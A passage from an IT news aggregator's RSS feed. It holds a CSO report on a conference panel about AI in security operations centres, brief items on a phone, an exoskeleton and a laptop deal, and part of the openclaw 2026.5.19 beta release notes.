<p>The post <a rel="nofollow" href="https://cyble.com/blog/jomangy-inj3ctor3s-self-healing-freepbx-toll-fraud-campaign/">JOMANGY: INJ3CTOR3’s Self-Healing FreePBX Toll Fraud Campaign</a> appeared first on <a rel="nofollow" href="https://cyble.com/">Cyble</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[AI becoming an SOC imperative for curtailing emerging cyber threats]]></title>
<description><![CDATA[The cybersecurity profession is on the verge of a sea change, and security pros must begin to master AI tools to combat emerging threats by building more autonomous, real-time protections.



Expert panelists at a recent DTX conference session in Manchester, titled “Bot vs Bot: Surviving the Era ...]]></description>
<link>https://tsecurity.de/de/3535371/it-security-nachrichten/ai-becoming-an-soc-imperative-for-curtailing-emerging-cyber-threats/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3535371/it-security-nachrichten/ai-becoming-an-soc-imperative-for-curtailing-emerging-cyber-threats/</guid>
<pubDate>Thu, 21 May 2026 09:08:26 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>The cybersecurity profession is on the verge of a sea change, and security pros must begin to master AI tools to combat emerging threats by building more autonomous, real-time protections.</p>



<p>Expert panelists at a recent DTX conference session in Manchester, titled “<a href="https://www.dtxevents.io/manchester-line-up/agenda#/seminars/panel-discussion-bot-vs-bot-surviving-the-era-of-autonomous-cyber-warfare">Bot vs Bot: Surviving the Era of Autonomous Cyber Warfare</a>,” highlighted how bringing AI into the security stack without weakening security fundamentals as become a security operations centre (SOC) essential. They also stressed the importance of maintaining human oversight over such systems.</p>



<p>While powerful, AI technologies are no panacea for immature enterprise security architectures, and they can only be applied successfully after the fundamentals of cyber defence are well covered, multiple security practitioner panellists argued. This ground layer, they said, includes system hardening, patching, access control, monitoring, and the like.</p>



<p>Darren Kimuli, information security lead at reinsurance firm Canopius Group, told delegates that AI deployments need to match the expectations of the business — including how an organisation meets its regulatory obligations.</p>



<p>“I’m more concerned about what AI fits rather than what it replaces,” Kimuli said.</p>



<h2 class="wp-block-heading">Changing roles</h2>



<p>Divine Uzodinma, cybersecurity analyst at managed services and telecom vendor Radius, said AI systems help security analysts correlate and triage security logs, a traditionally labour-intensive task.</p>



<p>“AI can analyse and correlate logs and triage alerts while analysts continue with their investigation,” Uzodinma said.</p>



<p>Muhammad Khan, head of cybersecurity at Bridgewater Finance Group, added that AI-based security tools minimise alert fatigue — a <a href="https://www.csoonline.com/article/574551/evolving-cyberattacks-alert-fatigue-creating-dfir-burnout-regulatory-risk.html">perennial problem in the industry</a> and a leading cause of staff burnout.</p>



<p>The more widespread use of AI systems has meant that the role of security analysts has evolved beyond monitoring and response to “validating inputs” and assessing the risk of AI model hallucination.</p>



<p>Enterprises need to test the resilience of AI-based security systems against modern attack paths, such as those found waged against applications and the cloud, as well as supplier access and phishing, according to cybersecurity consultancy Secarma.</p>



<p>George Rees, senior cybersecurity consultant at Secarma, noted that AI is already redefining cyber rules in areas such as risk management and resilience.</p>



<h2 class="wp-block-heading">Cyber battle ground redrawn</h2>



<p>The DTX conference panel also discussed how autonomous attacker tooling is changing the threat landscape.</p>



<p>The enterprise threat environment is evolving into a machine-versus-machine battle ground, meaning that CISOs and other security professionals need to drive change across their organizations or risk becoming hopelessly outflanked by adversaries who are making <a href="https://www.csoonline.com/article/3819176/top-5-ways-attackers-use-generative-ai-to-exploit-your-systems.html">greater use of AI technologies to mount attacks</a>.</p>



<p>Moreover, there needs to be clarity on cyber team roles and oversight when automation is used to make decisions.</p>



<p>Cyber job roles must be redefined to ensure humans can interpret and oversee autonomous security decisions, according to the panellists.</p>



<p>These changing roles mean that skills such as prompt engineering and risk analysis are becoming more important for security professionals and hiring managers, according to Rees.</p>



<p>“AI is creating opportunities for more GRC [governance, risk, and compliance] hires” because the skillset is well-suited to the new threat environment, Rees added.</p>



<p>Rees compared the scope and pace of change heralded by AI to the period in the 1970s and 1980s when enterprises moved from reliance on typewriters to running a business using computers.</p>



<p>The discussion was timely because enterprises are increasingly dealing with AI-accelerated reconnaissance, <a href="https://www.csoonline.com/article/3850783/11-ways-cybercriminals-are-making-phishing-more-potent-than-ever.html">phishing</a>, and <a href="https://www.csoonline.com/article/4169046/google-discovers-weaponized-zero-day-exploits-created-with-ai.html">malware development</a> rather than purely human-led attacks.</p>



<p>The debate has moved from whether to use AI in security to how to use it safely without losing oversight and control. Many of the responses by the DTX conference panellists showed an evolution in thinking since CSO <a href="https://www.csoonline.com/article/4054301/cisos-grapple-with-the-realities-of-applying-ai-to-security-functions.html">polled security practitioners they are applying AI for security functions</a> last September.</p>



<h2 class="wp-block-heading">Lessons from Microsoft’s war against scammers</h2>



<p>Kelly Bissell, a former corporate VP of product abuse and risk at Microsoft, who gave a keynote on cyber resilience and AI at the start of the DTX conference, told CSO after the show that an arms race is under way between cybersecurity professionals and attackers.</p>



<p>“Early adopters — in general — have the advantage,” Bissell said.</p>



<p>Here, according to Bissell, cybersecurity attackers gain an upper hand because they can ignore rules and regulations such as privacy laws, but defenders can claw back an edge on other fronts.</p>



<p>“Because of the scale of data we handled at Microsoft we could use machine learning techniques to see behavioural trends,” Bissell explained.</p>



<p>For example, Microsoft developed a neural network that was capable of identifying <a href="https://www.csoonline.com/article/570173/what-is-typosquatting-a-simple-but-effective-attack-technique.html">typosquatted domains</a> being set up prior to impersonation attacks with very low false positive rates. “Our mission was to apply pressure to bot gangs” and frustrate their activity, Bissell said.</p>



<p>According to Bissell, CISOs fall into one of three camps: compliance-orientated, package-focused, or elite practitioners.</p>



<p>“Elite practitioners will love to use AI to improve their operations,” said Bissell, adding that AI technologies should be introduced through a process akin to a software development life cycle with extensive pen testing and guardrails prior to being left anywhere near production systems.</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Oppo Find X9s Launched in India With Hasselblad-Tuned 50-Megapixel Cameras, 7,025mAh Battery: Price, Features]]></title>
<description><![CDATA[Oppo Find X9s has been launched in India as the latest addition to the company’s flagship Find X9 lineup. The handset is offered in Lavender Sky, Midnight Grey, and Sunset Orange colour options. The base variant features 12GB of RAM and 256GB of onboard storage. The Oppo Find X9s arrives with an ...]]></description>
<link>https://tsecurity.de/de/3535314/it-nachrichten/oppo-find-x9s-launched-in-india-with-hasselblad-tuned-50-megapixel-cameras-7025mah-battery-price-features/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3535314/it-nachrichten/oppo-find-x9s-launched-in-india-with-hasselblad-tuned-50-megapixel-cameras-7025mah-battery-price-features/</guid>
<pubDate>Thu, 21 May 2026 08:47:11 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Oppo Find X9s has been launched in India as the latest addition to the company’s flagship Find X9 lineup. The handset is offered in Lavender Sky, Midnight Grey, and Sunset Orange colour options. The base variant features 12GB of RAM and 256GB of onboard storage. The Oppo Find X9s arrives with an octa core MediaTek Dimensity 9500s chipset. The handset carries a Hasse...]]></content:encoded>
</item>
<item>
<title><![CDATA[I Hiked Using Robot Legs in the Grand Canyon. I Didn’t Even Need My Cane]]></title>
<description><![CDATA[After testing out the Hypershell X Ultra S exoskeleton on a Grand Canyon hike, I learned that this tech is a tool, not a cure for my disability. Here’s what it can do for you.]]></description>
<link>https://tsecurity.de/de/3533004/it-nachrichten/i-hiked-using-robot-legs-in-the-grand-canyon-i-didnt-even-need-my-cane/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3533004/it-nachrichten/i-hiked-using-robot-legs-in-the-grand-canyon-i-didnt-even-need-my-cane/</guid>
<pubDate>Wed, 20 May 2026 14:47:22 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[After testing out the Hypershell X Ultra S exoskeleton on a Grand Canyon hike, I learned that this tech is a tool, not a cure for my disability. Here’s what it can do for you.]]></content:encoded>
</item>
<item>
<title><![CDATA[Amazon slashes $250 off every 2026 16-inch MacBook Pro it sells]]></title>
<description><![CDATA[Amazon's May MacBook Pro sale delivers record-low prices on 2026 16-inch models with your choice of an M5 Pro or M5 Max chip.Grab record-low prices on Apple's 2026 16-inch MacBook Pro at Amazon.Save $250 on retail configurations from Apple's 2026 16-inch MacBook Pro line, with prices starting at ...]]></description>
<link>https://tsecurity.de/de/3529899/ios-mac-os/amazon-slashes-250-off-every-2026-16-inch-macbook-pro-it-sells/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3529899/ios-mac-os/amazon-slashes-250-off-every-2026-16-inch-macbook-pro-it-sells/</guid>
<pubDate>Tue, 19 May 2026 18:30:14 +0200</pubDate>
<category>🍏 iOS / Mac OS</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Amazon's May MacBook Pro sale delivers record-low prices on 2026 16-inch models with your choice of an M5 Pro or M5 Max chip.<br><br><div><img src="https://photos5.appleinsider.com/gallery/67689-142665-16-inch-macbook-pro-m5-max-deal-xl.jpg" alt="Silver Apple 16-inch MacBook Pro laptop with logo, Midnight AirPods Max headphones, small potted plant, camera lens, orange hard drives, and bright green starburst labeled NEW against a purple and gray background"><br><span>Grab record-low prices on Apple's 2026 16-inch MacBook Pro at Amazon.</span></div><br><strong><a href="https://www.amazon.com/dp/B0GR1JKMBV/?tag=apinsiderdeals-20" rel="nofollow" target="_blank">Save $250</a></strong> on retail configurations from Apple's 2026 16-inch MacBook Pro line, with prices starting at a record low $2,449.<br><br>Released in March 2026, the M5 Pro 16-inch MacBook Pro features higher unified memory bandwidth and is equipped with Apple's N1 chip for Wi-Fi 7 and Bluetooth 6 support.<br><br><br> <a href="https://appleinsider.com/articles/26/05/19/amazon-slashes-250-off-every-2026-16-inch-macbook-pro-it-sells?utm_source=rss">Continue Reading on AppleInsider</a> | <a href="https://forums.appleinsider.com/discussion/244393?urm_source=rss">Discuss on our Forums</a>]]></content:encoded>
</item>
<item>
<title><![CDATA[openclaw 2026.5.19-beta.1]]></title>
<description><![CDATA[2026.5.19
Changes

Agents: clarify that fixes should default to clean bounded refactors, lean internals, and explicit plugin SDK/API deprecation paths.
Dependencies: update @openclaw/proxyline to 0.3.3.
Dependencies: update Pi packages to 0.75.1 and raise the minimum supported Node.js 22 line to ...]]></description>
<link>https://tsecurity.de/de/3527452/downloads/openclaw-2026519-beta1/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3527452/downloads/openclaw-2026519-beta1/</guid>
<pubDate>Tue, 19 May 2026 01:01:25 +0200</pubDate>
<category>💾 Downloads</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<h2>2026.5.19</h2>
<h3>Changes</h3>
<ul>
<li>Agents: clarify that fixes should default to clean bounded refactors, lean internals, and explicit plugin SDK/API deprecation paths.</li>
<li>Dependencies: update <code>@openclaw/proxyline</code> to 0.3.3.</li>
<li>Dependencies: update Pi packages to 0.75.1 and raise the minimum supported Node.js 22 line to 22.19.</li>
<li>Docker/Podman: add <code>OPENCLAW_IMAGE_APT_PACKAGES</code> as the runtime-neutral image build arg for extra apt packages while keeping <code>OPENCLAW_DOCKER_APT_PACKAGES</code> as a legacy fallback. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4217026381" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/62431" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/62431/hovercard" href="https://github.com/openclaw/openclaw/pull/62431">#62431</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/urtabajev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/urtabajev">@urtabajev</a>.</li>
<li>Gateway/ACPX: attribute startup probe, config, runtime, and resource-count costs in restart traces without changing readiness behavior. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4465177610" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/83300" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/83300/hovercard" href="https://github.com/openclaw/openclaw/pull/83300">#83300</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/samzong/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/samzong">@samzong</a>.</li>
<li>Gateway: overlap startup logging and plugin-service startup with channel sidecars to reduce restart ready latency while preserving <code>/readyz</code> sidecar gating. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4465177851" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/83301" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/83301/hovercard" href="https://github.com/openclaw/openclaw/pull/83301">#83301</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/samzong/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/samzong">@samzong</a>.</li>
<li>Plugins/admin-http-rpc: allow trusted admin HTTP RPC clients to start and wait for web QR login flows. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4464874472" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/83259" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/83259/hovercard" href="https://github.com/openclaw/openclaw/pull/83259">#83259</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/liorb-mountapps/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/liorb-mountapps">@liorb-mountapps</a>.</li>
<li>Mac app: redesign Settings pages with consistent card layouts, cached navigation, cleaner permissions/voice/skills/cron/exec/debug panes, and steadier spacing around the native sidebar.</li>
<li>Skills: rename the repo-local Codex closeout review skill and helper to <code>autoreview</code> while preserving the Codex-first fallback behavior.</li>
<li>Skills: add a meme-maker skill for curated template search, local SVG/PNG rendering, Imgflip hosted rendering, and Know Your Meme provenance links.</li>
<li>Skills CLI: allow <code>openclaw skills install</code> and <code>openclaw skills update</code> to target shared managed skills with <code>--global</code>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4351987851" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74466" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/74466/hovercard" href="https://github.com/openclaw/openclaw/pull/74466">#74466</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Marvae/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Marvae">@Marvae</a>.</li>
<li>Browser: surface pending and recently handled modal dialogs in snapshots, return <code>blockedByDialog</code> when an action opens a modal, and allow <code>browser dialog --dialog-id</code> to answer pending dialogs.</li>
<li>Browser CLI: add <code>openclaw browser evaluate --timeout-ms</code> so long-running page functions can extend both the evaluate action and request timeout budgets. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4466445698" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/83447" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/83447/hovercard" href="https://github.com/openclaw/openclaw/pull/83447">#83447</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/eefreenyc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/eefreenyc">@eefreenyc</a>.</li>
<li>Codex app-server: scope OpenClaw prompt guidance by runtime surface so native Codex keeps Codex-owned base/personality instructions while OpenClaw contributes only runtime context, delivery guidance, and explicitly scoped command hints. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4466538467" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/83454" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/83454/hovercard" href="https://github.com/openclaw/openclaw/pull/83454">#83454</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/100yenadmin/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/100yenadmin">@100yenadmin</a>.</li>
<li>Agents/tools: shorten built-in tool descriptions and schema hints across media, messaging, sessions, cron, Gateway, web, image/PDF, TTS, nodes, and plan tools while preserving routing guardrails.</li>
<li>Skills: add node inspector debugging, fused diagram generation, and throwaway spike workflow skills.</li>
<li>CLI/plugins: add <code>defineToolPlugin</code> plus <code>openclaw plugins build</code>, <code>validate</code>, and <code>init</code> for typed simple tool plugins with generated manifest metadata, optional tool declarations, and context factories.</li>
<li>Agents/skills: tighten bundled skill prompts and metadata, quote skill descriptions, refresh current CLI/API guidance, and update embedded sherpa-onnx runtime downloads.</li>
<li>Skills: update the Obsidian skill to target the official <code>obsidian</code> CLI and require its registered binary instead of the third-party <code>obsidian-cli</code>.</li>
<li>Skills: add a Python debugging skill for pdb, breakpoint(), post-mortem inspection, and debugpy remote attach.</li>
<li>Plugins/messages: add presentation capability limits for channel renderers, adapt rich message controls before native rendering, and mark legacy <code>interactive</code>/Slack directive producer APIs as deprecated.</li>
<li>Plugins/subagents: store channel delivery routes as canonical session metadata and deprecate ad hoc subagent hook delivery-origin fields in favor of core route projection.</li>
<li>Proxy: support HTTPS managed forward-proxy endpoints and scoped <code>proxy.tls.caFile</code> CA trust for proxy endpoint TLS. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4403048153" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/79171" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/79171/hovercard" href="https://github.com/openclaw/openclaw/pull/79171">#79171</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jesse-merhi/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jesse-merhi">@jesse-merhi</a>.</li>
<li>QA-Lab: add first-hour 20-turn and optional 100-turn runtime parity scenarios, with tier metadata for standard and soak QA gates. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4416188988" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/80338" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/80338/hovercard" href="https://github.com/openclaw/openclaw/issues/80338">#80338</a>; refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4416188383" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/80337" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/80337/hovercard" href="https://github.com/openclaw/openclaw/issues/80337">#80337</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/100yenadmin/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/100yenadmin">@100yenadmin</a>.</li>
<li>QA-Lab: add <code>openclaw qa suite --runtime-parity-tier</code> and wire the standard Codex-vs-Pi tier into release checks separately from optional/live-only/soak lanes. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4416188383" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/80337" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/80337/hovercard" href="https://github.com/openclaw/openclaw/issues/80337">#80337</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/100yenadmin/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/100yenadmin">@100yenadmin</a>.</li>
<li>QA-Lab: add a live-only Codex Pi-shaped Read vocabulary canary so runtime parity catches native workspace-read prompt compatibility drift. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4416039198" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/80323" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/80323/hovercard" href="https://github.com/openclaw/openclaw/pull/80323">#80323</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/100yenadmin/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/100yenadmin">@100yenadmin</a>.</li>
<li>QA-Lab: add live-only harness self-health scenarios for plugin hook crashes, manifest contract errors, and WebChat direct-reply self-message routing. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4416039198" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/80323" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/80323/hovercard" href="https://github.com/openclaw/openclaw/pull/80323">#80323</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/100yenadmin/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/100yenadmin">@100yenadmin</a>.</li>
<li>QA-Lab: add runtime tool fixture scenarios and coverage reporting for Codex-native workspace tools, OpenClaw dynamic tools, and optional plugin-backed tools. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4415099454" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/80173" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/80173/hovercard" href="https://github.com/openclaw/openclaw/issues/80173">#80173</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/100yenadmin/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/100yenadmin">@100yenadmin</a>.</li>
<li>QA-Lab: expose runtime tool fixture coverage through <code>openclaw qa coverage --tools</code>, with optional suite-summary evaluation for parity gate artifacts. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/100yenadmin/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/100yenadmin">@100yenadmin</a>.</li>
<li>QA-Lab: schedule a live-frontier Codex-vs-Pi runtime token-efficiency artifact lane in the all-lanes QA workflow. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4415101470" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/80175" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/80175/hovercard" href="https://github.com/openclaw/openclaw/issues/80175">#80175</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/100yenadmin/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/100yenadmin">@100yenadmin</a>.</li>
<li>QA-Lab: hard-gate required OpenClaw dynamic runtime-tool drift in the standard Codex-vs-Pi tier with a blocking release-check verifier and publish the tool coverage report artifact. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4416189394" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/80339" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/80339/hovercard" href="https://github.com/openclaw/openclaw/issues/80339">#80339</a>; refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4416028202" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/80319" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/80319/hovercard" href="https://github.com/openclaw/openclaw/issues/80319">#80319</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/100yenadmin/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/100yenadmin">@100yenadmin</a>.</li>
<li>QA-Lab: add the personal-agent approval-denial scenario so the benchmark pack verifies denied local reads stop cleanly without tool progress or fixture leaks. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4463922408" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/83150" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/83150/hovercard" href="https://github.com/openclaw/openclaw/pull/83150">#83150</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/iFiras-Max1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/iFiras-Max1">@iFiras-Max1</a>.</li>
<li>QA-Lab: extend the personal-agent benchmark pack with a local task followthrough scenario for proof-backed pending, blocked, and done status reporting. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/iFiras-Max1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/iFiras-Max1">@iFiras-Max1</a>.</li>
<li>QA-Lab: add a report-only dreaming shadow-trial scenario so candidate memory promotion can be evaluated without mutating <code>MEMORY.md</code>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/iFiras-Max1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/iFiras-Max1">@iFiras-Max1</a>.</li>
<li>Gateway/performance: add <code>pnpm test:restart:gateway</code> benchmark tooling for repeated restart readiness, downtime, trace, and resource-slope evidence. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4465177384" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/83299" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/83299/hovercard" href="https://github.com/openclaw/openclaw/pull/83299">#83299</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/samzong/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/samzong">@samzong</a>.</li>
<li>Android: switch Talk Mode to realtime Gateway relay voice sessions with streaming mic input, realtime audio playback, tool-result bridging, and on-screen transcripts. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4463811067" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/83130" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/83130/hovercard" href="https://github.com/openclaw/openclaw/pull/83130">#83130</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/sliekens/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/sliekens">@sliekens</a>.</li>
<li>Gateway/config: expose config lookup reload metadata so tools can distinguish restart-required, hot-reloadable, and no-op fields before applying config edits. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4438060145" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/81409" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/81409/hovercard" href="https://github.com/openclaw/openclaw/issues/81409">#81409</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4442609432" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/81612" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/81612/hovercard" href="https://github.com/openclaw/openclaw/pull/81612">#81612</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/LLagoon3/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/LLagoon3">@LLagoon3</a>.</li>
<li>Telegram: add allowlisted native DM draft previews for transient tool progress while keeping final answers on the normal persistent delivery path. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4469802375" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/83622" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/83622/hovercard" href="https://github.com/openclaw/openclaw/pull/83622">#83622</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/akrimm702/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/akrimm702">@akrimm702</a>.</li>
<li>QA-Lab: add a personal-agent share-safe diagnostics artifact scenario so support handoffs keep useful status while omitting raw personal content. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/iFiras-Max1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/iFiras-Max1">@iFiras-Max1</a>.</li>
</ul>
<h3>Fixes</h3>
<ul>
<li>Memory/search: scan the JS-side fallback vector path (used when the sqlite-vec index is unavailable or has a mismatched dimension) in bounded rowid batches and yield to the event loop between batches so large chunk tables can no longer pin the Node.js main thread for multi-second windows. Also keeps the SQL prepared statement rooted in a local so node:sqlite cannot finalize it mid-scan under heap pressure. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4432718295" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/81172" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/81172/hovercard" href="https://github.com/openclaw/openclaw/issues/81172">#81172</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/dev23xyz-oss/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/dev23xyz-oss">@dev23xyz-oss</a>.</li>
<li>CLI/update: bypass npm freshness filters consistently during managed package and plugin installs so freshly published release plugins remain installable. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jalehman/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jalehman">@jalehman</a>.</li>
